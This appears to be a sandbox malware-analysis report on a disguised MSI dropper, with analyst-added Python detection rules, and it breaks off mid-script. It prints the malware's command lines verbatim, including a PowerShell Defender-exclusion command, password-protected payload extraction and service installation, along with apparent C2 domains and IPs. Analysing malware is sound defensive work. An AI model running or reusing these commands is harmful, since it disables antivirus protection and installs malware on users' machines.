N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1104 wrote to memory of 3972 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 1104 wrote to memory of 3972 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 1104 wrote to memory of 4328 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 1104 wrote to memory of 4328 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4328 wrote to memory of 2172 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4328 wrote to memory of 2172 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4328 wrote to memory of 1560 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 4328 wrote to memory of 1560 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1560 wrote to memory of 3160 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 3160 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 3160 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1560 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1560 wrote to memory of 972 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 972 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 972 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 4328 wrote to memory of 2556 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 4328 wrote to memory of 2556 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 4328 wrote to memory of 2556 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 4328 wrote to memory of 1440 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 4328 wrote to memory of 1440 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 4328 wrote to memory of 1440 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1440 wrote to memory of 2052 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp
PID 1440 wrote to memory of 2052 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp
PID 1440 wrote to memory of 2052 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp
PID 3896 wrote to memory of 3868 N/A C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3896 wrote to memory of 3868 N/A C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3896 wrote to memory of 3868 N/A C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3868 wrote to memory of 3492 N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3868 wrote to memory of 3492 N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3868 wrote to memory of 3492 N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 2052 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 2052 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 2BD1613784EED8CBD3268DBA80EEF8FC E Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\SustainSleekTutor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 127 -file file3 -mode mode3

C:\Program Files\SustainSleekTutor\tsetup.exe

"C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp" /SL5="$90066,44246395,814592,C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs"

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe" install

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe" start

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe"

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 291 -file file3 -mode mode3

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 62 -file file3 -mode mode3

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
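The process list above is the whole chain in order: PowerShell adds Defender exclusions for the drop directory, cmd.exe runs a renamed extractor with 7-Zip-style switches against two password-protected blobs (the passwords sit in the command line), `ping 127.0.0.1 -n 2` serves as a one-second sleep between the two extractions, the extracted EXE is launched, a decoy Inno Setup installer (tsetup.exe, Telegram Desktop) runs, WScript runs a dropped .vbs, and UhHKDmESOIjj.exe is called with `install` then `start`. The following detection rules are an added example for this page, not part of the sandbox report or of any tool it names; they run over the command lines exactly as printed above (copied into REPORT_CMDLINES) and pull out the items a responder wants first. Rule names, the finding format and the `-p"x&y"` case in the test are this example's own.

```python
"""Detection rules over the process command lines listed above.

Added example for this page; not part of the sandbox report or of any tool
it names. Rule names and output format are this example's own; the
command lines are copied from the report so the rules run offline.
"""
import re
from collections import defaultdict

# Copied from the process list above (sample input).
REPORT_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command '
    r"Add-MpPreference -ExclusionPath 'C:\Program Files\SustainSleekTutor',"
    r"'C:\Program Files','C:\Program Files'",
    r'"C:\Windows\System32\cmd.exe" /c start /min "" '
    r'"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x '
    r'"C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" '
    r'-o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y '
    r'& ping 127.0.0.1 -n 2 & start /min "" '
    r'"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x '
    r'"C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" '
    r'-x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe '
    r'-x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" '
    r'-p"98858uC(.?=^~2>PRa?!" -y',
    r'"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 127 -file file3 -mode mode3',
    r'C:\Windows\System32\WScript.exe "C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs"',
    r'"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe" install',
    r'"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe" start',
]


def split_chain(cmdline):
    """Split a cmd.exe chain on '&' outside double quotes.

    A -p"..." archive password may itself contain '&', so a plain
    str.split('&') would cut the password in half.
    """
    parts, cur, in_q = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_q = not in_q
        if ch == "&" and not in_q:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def rule_defender_exclusion(seg):
    """Add-MpPreference -Exclusion{Path,Process,Extension} ... -> (kind, value)."""
    if not re.search(r"\bAdd-MpPreference\b", seg, re.I):
        return []
    m = re.search(r"-Exclusion(Path|Process|Extension)\s+(.*)", seg, re.I)
    if not m:
        return []
    values = re.findall(r"'([^']+)'", m.group(2)) or [m.group(2).split()[0]]
    return [(m.group(1).lower(), v) for v in values]


ARCHIVE_RE = re.compile(r'"(?P<tool>[^"]+\.exe)"\s+x\s+"(?P<archive>[^"]+)"(?P<rest>.*)')


def rule_archive_extract(seg):
    """7-Zip-style 'x <archive> -o<dir> -p<password> -x!<skip>' -> (archive, pw, outdir, skipped)."""
    m = ARCHIVE_RE.search(seg)
    if not m:
        return []
    rest = m.group("rest")
    pw = re.search(r'-p"([^"]*)"', rest)
    out = re.search(r'-o"([^"]*)"', rest)
    skipped = re.findall(r"-x!(\S+)", rest)
    return [(m.group("archive"), pw.group(1) if pw else "", out.group(1) if out else "", len(skipped))]


def rule_ping_delay(seg):
    """'ping 127.0.0.1 -n N' used as a sleep -> N (Windows default is 4 echoes)."""
    if not re.search(r"(?:^|\s)ping(?:\.exe)?\s", seg, re.I):
        return []
    if not re.search(r"(?<![\w.])(?:127\.0\.0\.1|localhost)(?![\w.])", seg, re.I):
        return []
    n = re.search(r"-n\s+(\d+)", seg, re.I)
    return [int(n.group(1)) if n else 4]


SERVICE_RE = re.compile(r'"([^"]+\.exe)"\s+(install|uninstall|start|stop|restart)\s*$', re.I)
SCRIPT_RE = re.compile(r'\b[wc]script(?:\.exe)?"?\s+(?:"([^"]+)"|(\S+))', re.I)


def rule_service_ctl(seg):
    """A dropped EXE invoked with a service-wrapper verb -> (exe, verb)."""
    m = SERVICE_RE.search(seg)
    return [(m.group(1), m.group(2).lower())] if m else []


def rule_script_host(seg):
    """wscript/cscript launching a script file -> script path."""
    out = []
    for m in SCRIPT_RE.finditer(seg):
        path = m.group(1) or m.group(2)
        if re.search(r"\.(vbs|vbe|js|jse|wsf)$", path, re.I):
            out.append(path)
    return out


RULES = {
    "defender_exclusion": rule_defender_exclusion,
    "archive_extract": rule_archive_extract,
    "ping_delay": rule_ping_delay,
    "service_ctl": rule_service_ctl,
    "script_host": rule_script_host,
}


def triage(cmdlines):
    """Run every rule over every chained segment; dedupe and sort per rule."""
    found = defaultdict(set)
    for line in cmdlines:
        for seg in split_chain(line):
            for name, rule in RULES.items():
                found[name].update(rule(seg))
    return {name: sorted(found[name]) for name in RULES}
```

The archive rule records the password alongside the archive path because that is what lets an analyst open `lBktGjuuaOaTazRwJvXXhRyefRHhOg` and `NMnDkvvmlBOPWlKYckpqMpfXmIsbMf` from the Files list without re-detonating; the `-x!` count shows that the second extraction deliberately left several members (including `1_bFchqPntlegL.exe`) inside the archive.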

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 246.197.219.23.in-addr.arpa udp
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 dsfgdg5641rfe.icu udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
HK 38.47.221.100:80 dsfgdg5641rfe.icu tcp
US 8.8.8.8:53 100.221.47.38.in-addr.arpa udp
HK 27.124.9.39:13000 tcp
US 8.8.8.8:53 39.9.124.27.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
HK 27.124.9.39:13000 tcp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
US 8.8.8.8:53 51.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 100.76.161.95.in-addr.arpa udp
NL 149.154.167.99:443 td.telegram.org tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
NL 149.154.167.91:443 tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 149.154.167.91:80 149.154.167.91 tcp
US 8.8.8.8:53 91.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 mozilla.cloudflare-dns.com udp
SG 149.154.171.5:443 tcp
SG 149.154.171.5:80 149.154.171.5 tcp
US 172.64.41.4:443 mozilla.cloudflare-dns.com tcp
NL 95.161.76.101:443 tcp
US 8.8.8.8:53 4.41.64.172.in-addr.arpa udp
US 8.8.8.8:53 5.171.154.149.in-addr.arpa udp
US 8.8.8.8:53 101.76.161.95.in-addr.arpa udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
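The table mixes three things: forward DNS queries, the sandbox resolver's own reverse (in-addr.arpa) lookups of every peer it recorded, and the TCP connections, some of which carry no name in the Domain column. The script below, an added example that is not part of the sandbox report or of any tool it names, parses the rows as printed (a representative subset is copied into REPORT_ROWS), discards the PTR noise, and sorts the rest into the buckets an analyst reads first: connections not explained by an allowlisted name, non-standard ports, and names that were queried but never connected to. ALLOWLIST is an analyst-supplied assumption that attributes the telegram.org and cloudflare-dns.com traffic to the bundled Telegram Desktop client rather than to the RAT.

```python
"""Sort the flattened Network table above into analyst buckets.

Added example for this page; not part of the sandbox report or of any tool
it names. REPORT_ROWS is a subset of the table copied verbatim (Country,
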